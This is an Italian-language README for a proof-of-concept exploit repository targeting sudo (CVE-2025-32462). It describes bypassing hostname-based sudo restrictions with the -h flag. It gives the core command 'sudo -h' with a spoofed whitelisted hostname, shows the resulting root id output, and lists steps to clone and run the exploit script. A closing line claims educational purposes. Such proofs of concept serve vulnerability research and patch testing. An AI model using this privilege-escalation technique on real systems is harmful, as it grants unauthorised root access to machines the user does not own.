
Exploit CVE-2025-32462
Escalation dei privilegi tramite spoofing dell'hostname (CVE-2025-32462)
"Prendi la pillola blu... la storia finisce. Prendi la pillola rossa... ottieni root."
Questo exploit dimostra una vulnerabilità di escalation dei privilegi in sudo (CVE-2025-32462) in cui le restrizioni basate sul nome host possono essere bypassate tramite il flag -h. La PoC crea un ambiente utente limitato, quindi vi sfugge facendo spoofing di un nome host nella whitelist per ottenere accesso root.
[user@matrix-node]$ sudo -h zion-core bash # Spoof whitelisted hostname
[root@matrix-node]# id # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)
Clona il repository:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Rendilo eseguibile ed esegui:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Segui i prompt interattivi per dimostrare:
Solo per scopi educativi/di ricerca. Usalo solo su sistemi che possiedi o su cui hai il permesso di testare.